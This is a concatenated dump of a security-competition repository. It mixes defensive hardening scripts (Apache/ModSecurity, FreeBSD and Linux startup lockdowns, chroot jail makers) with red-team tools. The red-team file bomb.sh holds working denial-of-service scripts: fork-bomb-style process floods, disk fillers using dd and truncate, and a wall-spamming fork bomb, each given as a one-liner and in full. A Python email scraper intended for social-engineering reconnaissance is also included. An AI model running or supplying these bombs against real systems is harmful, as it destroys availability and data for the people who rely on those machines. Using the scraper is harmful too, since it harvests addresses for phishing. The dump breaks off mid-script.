${APACHE_RUN_USER} 33 | Group ${APACHE_RUN_GROUP} 34 | AccessFileName .htaccess 35 | 36 | Order allow,deny 37 | Deny from all 38 | Satisfy all 39 | 40 | DefaultType None 41 | HostnameLookups Off 42 | ErrorLog ${APACHE_LOG_DIR}/error.log 43 | LogLevel warn 44 | Include mods-enabled/*.load 45 | Include mods-enabled/*.conf 46 | Include ports.conf 47 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 48 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 49 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 50 | LogFormat "%{Referer}i -> %U" referer 51 | LogFormat "%{User-agent}i" agent 52 | Include conf.d/ 53 | Include sites-enabled/ 54 | ServerSignature Off 55 | ServerTokens Prod 56 | TraceEnable Off 57 | FileETag None 58 | LimitRequestLine 4000 59 | MaxRequestsPerChild 10000 60 | LimitRequestFieldSize 4000 61 | LimitRequestFields 40 62 | LimitRequestBody 25000 63 | 64 | Order allow,deny 65 | Allow from all 66 | 67 | Deny from all 68 | 69 | 70 | 71 | Options -Indexes 72 | 73 | -------------------------------------------------------------------------------- /red/SE/email_scrape.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Jackson Sadowski 3 | #Pen Testing 4 | #Email Scraper 5 | 6 | from collections import OrderedDict 7 | import urllib2 8 | import sys 9 | import re 10 | 11 | #all the final emails 12 | finalEmails = [] 13 | 14 | #grabs the content of the page 15 | def getPageContent(url): 16 | try: 17 | response = urllib2.urlopen(url) 18 | html = response.read() 19 | print "Crawling " + str(url) 20 | return html 21 | #handling any error 22 | except: 23 | print "Error: URL couldn't be reached." 24 | return "" 25 | 26 | #finds the urls on the page 27 | def findUrls(html, site): 28 | urls = [] 29 | matches = re.findall(' 2: 55 | for item in range(0, int(sys.argv[2])): 56 | fh.write(item) 57 | fh.write("\n") 58 | else: 59 | for item in emailSet: 60 | fh.write(item) 61 | fh.write("\n") 62 | 63 | fh.close() 64 | 65 | def main(): 66 | args = sys.argv 67 | if len(args) < 2: 68 | print "USAGE: scrape.py URL [Number of Emails]" 69 | sys.exit(1) 70 | 71 | print "Starting scraper..." 72 | domain = args[1] 73 | 74 | pageContent = getPageContent(domain) 75 | urls = findUrls(pageContent, domain) 76 | 77 | for url in urls: 78 | content = getPageContent(url) 79 | findEmail(content) 80 | 81 | writeToFile(finalEmails) 82 | main() 83 | -------------------------------------------------------------------------------- /blue/apache2/apache2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #apache2 statup script 3 | 4 | #installing just in case it's not 5 | apt-get install apache2 -y 6 | 7 | #stopping apache server 8 | service apache2 stop 9 | 10 | #making a backup of the fresh configs 11 | mv /etc/apache2/apache2.conf /etc/apache2/apache2.conf.bak 12 | mv /etc/apache2/ports.conf /etc/apache2/ports.conf.bak 13 | 14 | #moving premade config to apache dir 15 | mv `pwd`/conf /etc/apache2/apache2.conf 16 | 17 | #making the new ports.conf file 18 | echo "NameVirtualHost *:80" > /etc/apache2/ports.conf 19 | echo "Listen 80" >> /etc/apache2/ports.conf 20 | echo "" >> /etc/apache2/ports.conf 21 | echo "" >> /etc/apache2/ports.conf 22 | echo "" >> /etc/apache2/ports.conf 23 | echo " Listen 443" >> /etc/apache2/ports.conf 24 | echo "" >> /etc/apache2/ports.conf 25 | 26 | #restarting service 27 | service apache2 restart 28 | 29 | #MOD SECURITY SECTION 30 | #installing dependencies 31 | apt-get install libxml2 libxml2-dev libxml2-utils -y 32 | apt-get install libaprutil1 libaprutil1-dev -y 33 | apt-get install php5 -y 34 | 35 | #installing mod security 36 | apt-get install libapache-mod-security -y 37 | 38 | #moving in my config file 39 | mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf.bak 40 | mv `pwd`/mod /etc/modsecurity/modsecurity.conf 41 | 42 | #installing OWASP Security measures 43 | wget -O SpiderLabs-owasp-modsecurity-crs.tar.gz https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master 44 | tar -zxf SpiderLabs-owasp-modsecurity-crs.tar.gz 45 | cp -R SpiderLabs-owasp-modsecurity-crs-*/* /etc/modsecurity/ 46 | rm SpiderLabs-owasp-modsecurity-crs.tar.gz 47 | rm -R SpiderLabs-owasp-modsecurity-crs-* 48 | mv /etc/modsecurity/modsecurity_crs_10_setup.conf.example /etc/modsecurity/modsecurity_crs_10_setup.conf 49 | 50 | #creating links 51 | cd /etc/modsecurity/base_rules 52 | for f in * ; do ln -s /etc/modsecurity/base_rules/$f /etc/modsecurity/activated_rules/$f ; done 53 | cd /etc/modsecurity/optional_rules 54 | for f in * ; do ln -s /etc/modsecurity/optional_rules/$f /etc/modsecurity/activated_rules/$f ; done 55 | 56 | #adding a php rule 57 | echo "expose_php = Off" >> /etc/php5/apache2/php.ini 58 | 59 | #restarting apache to enable 60 | service apache2 restart 61 | -------------------------------------------------------------------------------- /red/bombs/bomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #bombs are mainly for cpu depletion but also attempt to deplete hard drive space. if CPU is maxed out this doesn't happen very quickly 3 | #hdd-fillers are just meant to fill the hard drive quickly. CPU may be used up, but usually not fully. 4 | #wallbomb takes up CPU and is super annoying 5 | 6 | #yesbomb one 7 | #oneliner 8 | :{for(( i=0;;i+=1));do;yes balls>.$1$i&disown;done};words=`cat /usr/share/dict/words`;:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 9 | #full 10 | : 11 | { 12 | for (( i=0; ; i+=1 )); do 13 | yes balls > .$1$i & disown 14 | done 15 | } 16 | words=`cat /usr/share/dict/words` 17 | : kittykatz & disown 18 | c=0 19 | while true; do 20 | for word in $words; do 21 | : $word$c & disown 22 | done 23 | ((c++)) 24 | done 25 | 26 | #yesbomb two 27 | #oneliner 28 | :{for((i=0;;i+=1));do;man bash|yes>.$1$i&disown;done};words=`cat /usr/share/dict/words`;:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 29 | #full 30 | : 31 | { 32 | for (( i=0; ; i+=1 )); do 33 | man bash | yes > .$1$i & disown 34 | done 35 | } 36 | words=`cat /usr/share/dict/words` 37 | : kittykatz & disown 38 | c=0 39 | while true; do 40 | for word in $words; do 41 | : $word$c & disown 42 | done 43 | ((c++)) 44 | done 45 | 46 | #bomb three (truncate) - needs testing 47 | #oneliner 48 | :{for((i=0;;i+=1));do;truncate -s 1G .$1$i&disown;done};:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 49 | #full 50 | : 51 | { 52 | for (( i=0; ; i+=1 )); do 53 | truncate -s 1G .$1$i & disown 54 | done 55 | } 56 | : kittykatz & disown 57 | c=0 58 | while true; do 59 | for word in $words; do 60 | : $word$c & disown 61 | done 62 | ((c++)) 63 | done 64 | 65 | #bomb four (dd) - tested and rapes system 66 | #oneliner 67 | 68 | #full 69 | : 70 | { 71 | for (( i=0; ; i+=1 )); do 72 | dd if=/dev/urandom of=./.$1$i & disown 73 | done 74 | } 75 | : kittykatz & disown 76 | c=0 77 | while true; do 78 | for word in $words; do 79 | : $word$c & disown 80 | done 81 | ((c++)) 82 | done 83 | 84 | #bomb five truncate and morph - needs testing 85 | #bomb and hdd-filler 86 | #oneliner 87 | 88 | #full 89 | : 90 | { 91 | for (( i=0; ; i+=1 )); do 92 | mv $1 .$1$i 93 | done 94 | } 95 | c=0 96 | while true; do 97 | truncate -s 30G .$c 98 | : .$c & disown 99 | if [ $c -eq 10 ]; then 100 | break 101 | fi 102 | ((c++)) 103 | done 104 | 105 | #hdd-filler 2 106 | dd if=/dev/urandom of=./.file & disown 107 | 108 | #hdd-filler 3 109 | truncate -s 1000000G .file & disown 110 | 111 | #wallbomb 112 | #oneliner 113 | :(){echo "balls"|wall;:|:&disown};:&disown 114 | #full 115 | : 116 | { 117 | echo "balls" | wall 118 | : | : & disown 119 | } 120 | : & disown 121 | -------------------------------------------------------------------------------- /blue/startup-bsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #startup script for freebsd 3 | #MAKE SURE ALL THE TXT FILES ARE CORRECT 4 | #BEFORE RUNNING THIS SCRIPT 5 | #must be run as root 6 | #Text files needed: 7 | #ipfw.sh - will be a script containing the iptables rules you want 8 | 9 | IP_ADDR=10.2.3.3 10 | NETMASK=255.255.255.240 11 | GATEWAY=10.2.3.0 12 | TEAM_DNS_SRV=10.2.3.1 13 | 14 | #if not 1 param 15 | if [ $# -ne 1 ] 16 | then 17 | set "em0" 18 | echo "expected name of main interface, but automatically assumed to be 'em0'" 19 | fi 20 | 21 | /sbin/ifconfig $1 down 22 | 23 | def backup() 24 | { 25 | test -d /root/stuff || mkdir /root/stuff 26 | cd /root/stuff 27 | dirs="boot bin sbin etc var root home lib usr lib64" 28 | for dir in $dirs; do 29 | /bin/tar -cjf $dir.tar.bz /$dir 30 | /bin/tar -rf ../notes.tar stuff/$dir.tar.bz 31 | done 32 | } 33 | 34 | outfile=info.txt #set output file 35 | 36 | #cronjobs aka blowjob - remove cron for all users 37 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 38 | for user in $users; do 39 | crontab -r -u $user 40 | done &> /dev/null 41 | 42 | #destroy cron and anacron completely 43 | /bin/chown root:wheel /etc/crontab 44 | /bin/chmod o= /etc/crontab 45 | /bin/mv /etc/crontab /etc/.crontab.bak 46 | /bin/chflags schg /etc/.crontab.bak 47 | /bin/chmod o= /usr/bin/crontab 48 | 49 | /bin/chown root:wheel /usr/bin/crontab 50 | /bin/chmod o= /usr/bin/crontab 51 | /bin/chflags schg /usr/bin/crontab 52 | 53 | if [ test -e "/etc/anacrontab" ]; then 54 | /bin/chown root:wheel /etc/anacrontab 55 | /bin/chmod o= /etc/anacrontab 56 | /bin/chflags schg /etc/anacrontab 57 | 58 | /bin/chown root:wheel /usr/sbin/anacron 59 | /bin/chmod o= /usr/sbin/anacron 60 | /bin/chflags schg /usr/sbin/anacron 61 | 62 | /bin/chown root:wheel /etc/anacrontab 63 | /bin/mv /etc/anacrontab /etc/.anacrontab.bak 64 | /bin/chflags schg /etc/anacrontab 65 | fi 66 | 67 | #handle filez 68 | /bin/chmod ugo= /usr/bin/rlogin 69 | /bin/chmod ugo= /usr/bin/rsh 70 | /bin/chmod o= /usr/bin/at 71 | /bin/chmod o= /usr/bin/atq 72 | /bin/chmod o= /usr/bin/atrm 73 | /bin/chmod o= /usr/bin/batch 74 | /bin/chmod o= /etc/fstab 75 | /bin/chmod o= /etc/ftpusers 76 | /bin/chmod o= /etc/group 77 | /bin/chmod o= /etc/hosts 78 | /bin/chmod o= /etc/hosts.allow 79 | /bin/chmod o= /etc/hosts.equiv 80 | /bin/chmod o= /etc/hosts.lpd 81 | /bin/chmod o= /etc/inetd.conf 82 | /bin/chmod o= /etc/login.access 83 | /bin/chmod o= /etc/login.conf 84 | /bin/chmod o= /etc/newsyslog.conf 85 | /bin/chmod o= /etc/rc.conf 86 | /bin/chmod o= /etc/ssh/sshd_config 87 | /bin/chmod o= /etc/sysctl.conf 88 | /bin/chmod o= /etc/syslog.conf 89 | /bin/chmod o= /etc/ttys 90 | 91 | #firewall stuff 92 | /usr/bin/service ipfw start 93 | /bin/cp /etc/rc.conf /etc/rc.conf.bak 94 | ./ipfw.sh 95 | echo "firewall_enable=\"YES\"" > /etc/rc.conf 96 | echo "firewall_type=\"client\"" >> /etc/rc.conf 97 | echo "firewall_script=\"`pwd`/ipfw.sh\"" >> /etc/rc.conf 98 | echo "firewall_logging=\"YES\"" >> /etc/rc.conf 99 | 100 | #other startup stuff 101 | echo "ipv6_enable=\"NO\"" >> /etc/rc.conf 102 | echo "inetd_enable=\"NO\"" >> /etc/rc.conf 103 | echo "sendmail_enable=\"NONE\"" >> /etc/rc.conf 104 | echo "portmap_enable=\"NO\"" >> /etc/rc.conf 105 | echo "clear_tmp_enable=\"YES\"" >> /etc/rc.conf 106 | echo "syslogd_flags=\"-ss\"" >> /etc/rc.conf 107 | echo "icmp_drop_redirect=\"YES\"" >> /etc/rc.conf 108 | 109 | #stop usually unnecessary services 110 | services="cron cups samba smbd inetd portmap rsync rlogin" 111 | for service in $services; do 112 | /usr/sbin/service $service stop 113 | echo "/usr/sbin/service $service stop" >> /usr/local/etc/rc.d/services.sh 114 | done 115 | chmod u+x /usr/local/etc/rc.d/services.sh 116 | 117 | #set static ip address, gateway and DNS 118 | /sbin/ifconfig $1 $IP_ADDR netmask $NETMASK 119 | /sbin/route add default $GATEWAY 120 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf 121 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf 122 | #echo "nameserver $TEAM_DNS_SRV" >> /etc/resolv.conf 123 | 124 | #add to startup file 125 | echo "ifconfig_$1=\"$IP_ADDR netmask $NETMASK\"" >> /etc/rc.conf 126 | echo "default_router=\"$GATEWAY\"" >> /etc/rc.conf 127 | 128 | #hosts file mgmt 129 | hosts="/etc/hosts" 130 | 131 | /bin/chflags noschg $hosts 132 | /bin/cp $hosts $hosts.backup 133 | echo "127.0.0.1 localhost" > $hosts 134 | /bin/chown root:wheel $hosts 135 | /bin/chmod 600 $hosts 136 | /bin/chflags schg $hosts 137 | 138 | #remove all users but root from wheel group 139 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 140 | for user in $users; do 141 | pw groupmod wheel -d $user 142 | done &> /dev/null 143 | 144 | #edit sudoers 145 | if [ test -e "/usr/local/etc/sudoers" ]; then 146 | /bin/mv /usr/local/etc/sudoers /usr/local/etc/.sudoers.bak 147 | echo " " > /usr/local/etc/sudoers 148 | /bin/chown root:wheel /usr/local/etc/sudoers 149 | /bin/chmod 000 /usr/local/etc/sudoers 150 | /bin/chflags schg /usr/local/etc/sudoers 151 | fi 152 | 153 | #bring networking back up 154 | /sbin/ifconfig $1 up 155 | 156 | #update 157 | /usr/sbin/freebsd-update fetch install &disown &>.updateinfo.txt 158 | 159 | #make chrooted jail for ssh 160 | 161 | 162 | #Make Sure No Non-Root Accounts Have UID Set To 0 163 | echo "Accounts with UID = 0" >> $outfile 164 | echo `/usr/bin/awk -F: '($3 == "0") {print}' /etc/passwd` >> $outfile 165 | echo "" >> $outfile 166 | 167 | #all listening ports 168 | echo "All the ports that you're listening on" >> $outfile 169 | echo `/usr/bin/netstat -na | /usr/bin/grep -iF listen` >> $outfile 170 | echo "" >> $outfile 171 | 172 | #finding all of the world-writeable files 173 | echo "All of the world-writable files" >> $outfile 174 | echo `/usr/bin/find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print` >> $outfile &disown 175 | 176 | #backup important files and directories 177 | backup &>.backup_info.txt &disown 178 | 179 | #rename certain executables and chattr them 180 | /bin/mv /usr/bin/gcc /usr/bin/zgcc 181 | /bin/chflags schg /usr/bin/zgcc 182 | /bin/mv /sbin/reboot /sbin/zreboot 183 | /bin/chflags schg /sbin/zreboot 184 | /bin/mv /sbin/shutdown /sbin/zshutdown 185 | /bin/chflags schg /sbin/zshutdown 186 | 187 | 188 | 189 | -------------------------------------------------------------------------------- /blue/jail_maker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Luke Matarazzo 3 | # Copyright (c) 2013, Luke Matarazzo 4 | # All rights reserved. 5 | # TO DO: 6 | # add full paths to any commands (see copy_libraries()) 7 | # add user resource management (to limit effect of forkbomb, etc.) 8 | 9 | if [ "$1" = "-h" -o "$1" = "--help" ]; then 10 | echo "Usage: ./jail_maker [OPTION] [JAIL_PATH]" 11 | #echo " ./jail_maker [CONFIG_FILE]" 12 | echo "Note: must be run as root." 13 | echo "Create a jail environment to be used as in a chroot jail configuration." 14 | echo "" 15 | echo "Invoking the script without any parameters will enter the script in manual configuration mode in which it will prompt you on how to create the jail" 16 | echo " -h, --help print this help information" 17 | echo " -s, --secure configure a very secure jail with the bare minimum" 18 | echo " of executables and libraries" 19 | echo "" 20 | echo "Remember: must be run as root to 100% successful. When script prompts for users, it creates their home directory in the jail and assumes they already exist as users on the system and gives them ownership of their home directories. If they don't yet exist, you will have to manually change the ownership of their home directories after the script runs." 21 | fi 22 | 23 | copy_libraries(){ 24 | # iggy ld-linux* file as it is not shared one 25 | FILES="$(ldd $1 | awk '{ print $3 }' | egrep -v ^'\(')" 26 | 27 | #echo "Copying shared files/libs to $path..." 28 | for i in $FILES 29 | do 30 | d="$(dirname $i)" 31 | [ ! -d $path$d ] && /bin/mkdir -p $path$d || : 32 | /bin/cp $i $path$d 33 | done 34 | 35 | # copy /lib/ld-linux* or /lib64/ld-linux* to $path/$sldlsubdir 36 | # get ld-linux full file location 37 | sldl="$(ldd $1 | grep 'ld-linux' | awk '{ print $1}')" 38 | # now get sub-dir 39 | sldlsubdir="$(dirname $sldl)" 40 | 41 | if [ ! -f $path$sldl ]; 42 | then 43 | #echo "Copying $sldl $path$sldlsubdir..." 44 | /bin/cp $sldl $path$sldlsubdir 45 | else 46 | : 47 | fi 48 | } 49 | 50 | error_file=".jm_error" 51 | 52 | if [ "$1" = "-s" -o "$1" = "--secure" ]; then 53 | if [ "$#" -ne 2 ]; then 54 | echo "A jail path must be specified with the --secure (-s) option." 55 | exit 1 56 | fi 57 | 58 | shift 59 | echo "Initializing secure jail setup..." 60 | if test -d $1; then 61 | cd $1 62 | path=`echo $PWD` 63 | else 64 | path="$1" 65 | fi 66 | shift 67 | 68 | #set up jail environment directories 69 | /bin/mkdir -p $path 70 | /bin/mkdir -p $path/{dev,etc,lib,usr,bin,home} 71 | /bin/mkdir -p $path/usr/bin 72 | user="none" 73 | while [ true ]; do 74 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 75 | if [ "$user" = "" ]; then 76 | break; 77 | fi 78 | groupadd sshusers 79 | /usr/sbin/usermod -g sshusers $user 80 | /bin/mkdir -p $path/home/$user 81 | /bin/chmod 750 $path/home/$user 82 | /bin/chown -f $user $path/home/$user 83 | done 84 | /bin/chown -f root.root $path 85 | /bin/mknod -m 666 $path/dev/null c 1 3 86 | 87 | #copy over bare minimum files 88 | /bin/cp /etc/ld.so.cache $path/etc 89 | /bin/cp /etc/ld.so.conf $path/etc 90 | /bin/cp /etc/nsswitch.conf $path/etc 91 | /bin/cp /etc/hosts $path/etc 92 | 93 | #copy bare minimum executables 94 | /bin/cp /bin/ls $path/bin 95 | /bin/cp /bin/bash $path/bin 96 | /bin/cp /bin/cat $path/bin 97 | /bin/cp /bin/cp $path/bin 98 | /bin/cp /bin/mv $path/bin 99 | /bin/cp /bin/rm $path/bin 100 | /bin/cp /bin/mkdir $path/bin 101 | /bin/cp /bin/rmdir $path/bin 102 | /bin/cp /bin/dir $path/bin 103 | /bin/cp /bin/pwd $path/bin 104 | /bin/cp /usr/bin/vi $path/usr/bin 105 | 106 | set "/bin/ls /bin/cat /bin/bash /bin/cp /bin/mv /bin/rm /bin/mkdir /bin/rmdir /bin/dir /bin/pwd /usr/bin/vi" 107 | 108 | #copy appropriate libraries 109 | for exec in $@; do 110 | copy_libraries $exec 111 | done 2> $error_file 112 | 113 | if test -e $error_file; then 114 | echo "Some libraries may not have copied properly" 115 | /bin/rm $error_file 116 | fi 117 | fi 118 | 119 | if [ "$#" -eq 0 ]; then 120 | echo "Initializing manual setup" 121 | read -p "Enter path of jail directory: " dir 122 | if test -d $dir; then 123 | cd $dir 124 | path=`echo $PWD` 125 | else 126 | path="$dir" 127 | fi 128 | 129 | #set up jail environment directories 130 | /bin/mkdir -p $path 131 | /bin/mkdir -p $path/{dev,etc,lib,usr,bin,home} 132 | /bin/mkdir -p $path/usr/bin 133 | user="none" 134 | while [ true ]; do 135 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 136 | if [ "$user" = "" ]; then 137 | break; 138 | fi 139 | /bin/mkdir -p $path/home/$user 140 | /bin/chmod 750 $path/home/$user 141 | /bin/chown -f $user $path/home/$user 142 | done 143 | /bin/chown -f root.root $path 144 | /bin/mknod -m 666 $path/dev/null c 1 3 145 | 146 | #copy over bare minimum files 147 | /bin/cp /etc/ld.so.cache $path/etc 148 | /bin/cp /etc/ld.so.conf $path/etc 149 | /bin/cp /etc/nsswitch.conf $path/etc 150 | /bin/cp /etc/hosts $path/etc 151 | 152 | #ask and copy executables 153 | echo "Which executables would you like in your jail?" 154 | common_bins=`/bin/ls /bin` 155 | 156 | for i in $common_bins; do 157 | read -p "$i (Y/N):" choice 158 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 159 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 160 | /bin/cp /bin/$i $path/bin 161 | bins+="/bin/$i " 162 | fi 163 | done 164 | 165 | read -p "Would you like to choose between a few common binaries in /usr/bin (Y/N): " more_bins 166 | more_bins=`echo $more_bins | tr '[:lower:]' '[:upper:]'` 167 | if [ "$more_bins" = "YES" -o "$more_bins" = "Y" ]; then 168 | other_bins="awk clear cut diff expr head less man nano paste pico split strings strip tail tee test touch tr uniq users uptime vi w wall wc wget whatis who whoami yes zip zipgrep" 169 | 170 | for i in $other_bins; do 171 | read -p "$i (Y/N):" choice 172 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 173 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 174 | /bin/cp /usr/bin/$i $path/usr/bin 175 | bins+="/usr/bin/$i " 176 | fi 177 | done 178 | fi 179 | 180 | #copy appropriate libraries 181 | set $bins 182 | 183 | for exec in $@; do 184 | copy_libraries $exec 185 | done 2> $error_file 186 | 187 | if test -e $error_file; then 188 | echo "Some libraries may not have copied properly" 189 | /bin/rm $error_file 190 | fi 191 | fi 192 | -------------------------------------------------------------------------------- /blue/jail_maker_freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Author: Luke Matarazzo 3 | # Copyright (c) 2013, Luke Matarazzo 4 | # All rights reserved. 5 | 6 | if [ "$1" = "-h" -o "$1" = "--help" ]; then 7 | echo "Usage: ./jail_maker [OPTION] [JAIL_PATH]" 8 | #echo " ./jail_maker [CONFIG_FILE]" 9 | echo "Note: must be run as root." 10 | echo "Create a jail environment to be used as in a chroot jail configuration." 11 | echo "" 12 | echo "Invoking the script without any parameters will enter the script in manual configuration mode in which it will prompt you on how to create the jail" 13 | echo " -h, --help print this help information" 14 | echo " -s, --secure configure a very secure jail with the bare minimum" 15 | echo " of executables and libraries" 16 | echo "" 17 | echo "Remember: must be run as root to 100% successful. When script prompts for users, it creates their home directory in the jail and assumes they already exist as users on the system and gives them ownership of their home directories. If they don't yet exist, you will have to manually change the ownership of their home directories after the script runs." 18 | fi 19 | 20 | copy_libraries(){ 21 | # iggy ld-linux* file as it is not shared one 22 | FILES="$(/usr/bin/ldd $1 | /usr/bin/awk '{ print $3 }' |/usr/bin/egrep -v ^'\(')" 23 | 24 | #echo "Copying shared files/libs to $path..." 25 | for i in $FILES 26 | do 27 | d="$(dirname $i)" 28 | [ ! -d $path$d ] && /bin/mkdir -p $path$d || : 29 | /bin/cp $i $path$d 30 | done 31 | 32 | # copy /lib/ld-linux* or /lib64/ld-linux* to $path/$sldlsubdir 33 | # get ld-linux full file location 34 | sldl="$(/usr/bin/ldd $1 | /usr/bin/grep 'ld-linux' | /usr/bin/awk '{ print $1}')" 35 | # now get sub-dir 36 | sldlsubdir="$(dirname $sldl)" 37 | 38 | if [ ! -f $path$sldl ]; 39 | then 40 | #echo "Copying $sldl $path$sldlsubdir..." 41 | /bin/cp $sldl $path$sldlsubdir 42 | else 43 | : 44 | fi 45 | } 46 | 47 | error_file=".jm_error" 48 | 49 | if [ "$1" = "-s" -o "$1" = "--secure" ]; then 50 | if [ "$#" -ne 2 ]; then 51 | echo "A jail path must be specified with the --secure (-s) option." 52 | exit 1 53 | fi 54 | 55 | shift 56 | echo "Initializing secure jail setup..." 57 | if test -d $1; then 58 | cd $1 59 | path=`echo $PWD` 60 | else 61 | path="$1" 62 | fi 63 | shift 64 | 65 | #set up jail environment directories 66 | /bin/mkdir -p $path 67 | /bin/mkdir -p $path/{dev,etc,lib,libexec,usr,bin,home} 68 | /bin/mkdir -p $path/usr/bin 69 | user="none" 70 | while [ true ]; do 71 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 72 | if [ "$user" = "" ]; then 73 | break; 74 | fi 75 | /bin/mkdir -p $path/home/$user 76 | /bin/chmod 750 $path/home/$user 77 | /usr/sbin/chown -f $user $path/home/$user 78 | done 79 | /usr/sbin/chown -f root:wheel $path 80 | /sbin/mknod $path/dev/null c 1 3 81 | 82 | #copy over bare minimum files 83 | /bin/cp /libexec/ld-elf.so.1 $path/libexec/ld-elf.so.1 84 | /bin/cp /etc/nsswitch.conf $path/etc 85 | /bin/cp /etc/hosts $path/etc 86 | 87 | #copy bare minimum executables 88 | /bin/cp /bin/ls $path/bin 89 | /bin/cp /bin/cat $path/bin 90 | /bin/cp /bin/sh $path/bin 91 | /bin/cp /bin/cp $path/bin 92 | /bin/cp /bin/mv $path/bin 93 | /bin/cp /bin/rm $path/bin 94 | /bin/cp /bin/mkdir $path/bin 95 | /bin/cp /bin/rmdir $path/bin 96 | /bin/cp /bin/pwd $path/bin 97 | /bin/cp /usr/bin/vi $path/usr/bin 98 | 99 | set "/bin/ls /bin/sh /bin/cat /bin/cp /bin/mv /bin/rm /bin/mkdir /bin/rmdir /bin/pwd /usr/bin/vi" 100 | 101 | #copy appropriate libraries 102 | for exec in $@; do 103 | copy_libraries $exec 104 | done 2> $error_file 105 | 106 | if test -e $error_file; then 107 | echo "Some libraries may not have copied properly" 108 | /bin/rm $error_file 109 | fi 110 | fi 111 | 112 | if [ "$#" -eq 0 ]; then 113 | echo "Initializing manual setup" 114 | read -p "Enter path of jail directory: " dir 115 | if test -d $dir; then 116 | cd $dir 117 | path=`echo $PWD` 118 | else 119 | path="$dir" 120 | fi 121 | 122 | #set up jail environment directories 123 | /bin/mkdir -p $path 124 | /bin/mkdir -p $path/{dev,etc,lib,libexec,usr,bin,home,var,tmp} 125 | /bin/mkdir -p $path/var/tmp 126 | /bin/mkdir -p $path/tmp/vi.recover 127 | /usr/sbin/chown 777 $path/tmp/vi.recover 128 | /bin/ln -s $path/tmp $path/var/tmp 129 | /bin/mkdir -p $path/usr/bin 130 | /bin/mkdir -p $path/usr/share/misc 131 | user="none" 132 | while [ true ]; do 133 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 134 | if [ "$user" = "" ]; then 135 | break; 136 | fi 137 | /bin/mkdir -p $path/home/$user 138 | /bin/cp /home/$user/.* $path/home/$user &> /dev/null 139 | # /usr/sbin/chown -f -R $user:wheel $path/home/$user/.* 140 | /bin/chmod -R 750 $path/home/$user 141 | /usr/sbin/chown -f -R $user $path/home/$user 142 | done 143 | /usr/sbin/chown -f root:wheel $path 144 | /sbin/mknod $path/dev/null c 1 3 145 | 146 | #copy over bare minimum files 147 | /bin/cp /libexec/ld-elf.so.1 $path/libexec 148 | /bin/cp /etc/termcap.small $path/etc 149 | /bin/cp /usr/share/misc/termcap $path/usr/share/misc 150 | /bin/cp /etc/nsswitch.conf $path/etc 151 | /bin/cp /etc/hosts $path/etc 152 | 153 | #ask and copy executables 154 | echo "Which executables would you like in your jail?" 155 | common_bins=`ls /bin` 156 | 157 | for i in $common_bins; do 158 | read -p "$i (Y/N):" choice 159 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 160 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 161 | /bin/cp /bin/$i $path/bin 162 | bins+="/bin/$i " 163 | fi 164 | done 165 | 166 | read -p "Would you like to choose between a few common binaries in /usr/bin (Y/N): " more_bins 167 | more_bins=`echo $more_bins | tr '[:lower:]' '[:upper:]'` 168 | if [ "$more_bins" = "YES" -o "$more_bins" = "Y" ]; then 169 | other_bins="awk clear cut diff expr head less man nano paste pico split strings strip tail tee test touch tr uniq users uptime vi w wall wc wget whatis who whoami yes zip zipgrep" 170 | 171 | for i in $other_bins; do 172 | read -p "$i (Y/N):" choice 173 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 174 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 175 | /bin/cp /usr/bin/$i $path/usr/bin 176 | bins+="/usr/bin/$i " 177 | fi 178 | done 179 | fi 180 | 181 | #copy appropriate libraries 182 | set $bins 183 | 184 | for exec in $@; do 185 | copy_libraries $exec 186 | done 2> $error_file 187 | 188 | if test -e $error_file; then 189 | echo "Some libraries may not have copied properly" 190 | /bin/rm $error_file 191 | fi 192 | fi 193 | -------------------------------------------------------------------------------- /blue/startup-linux.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #MAKE SURE ALL THE TXT FILES ARE CORRECT 3 | #BEFORE RUNNING THIS SCRIPT 4 | #must be run as root 5 | #must change root password first! must! 6 | #Text files needed: 7 | #iptables.sh - will be a script containing the iptables rules you want 8 | #parameters 9 | #first param $1 - name of interface 10 | #################################################################################### 11 | #MAKE SURE YOU SET YOUR IP ADDRESS, MASK, and GATEWAY 12 | #ALSO CHECK IPTABLES SCRIPT BEFORE RUNNING, OR YOUR LIFE WILL BE bad 13 | 14 | IP_ADDR=10.150.100.20 15 | NETMASK=255.255.254.0 16 | GATEWAY=10.150.100.254 17 | TEAM_DNS_SRV=10.2.3.1 18 | 19 | #if not 1 param 20 | if [ $# -ne 1 ] 21 | then 22 | set "eth0" 23 | echo "expected name of main interface, but automatically assumed to be 'eth0'" 24 | fi 25 | 26 | backup() 27 | { 28 | test -d /root/stuff || mkdir /root/stuff 29 | cd /root/stuff 30 | dirs="boot bin sbin etc var root home lib usr lib64" 31 | for dir in $dirs; do 32 | /bin/tar -cjf $dir.tar.bz 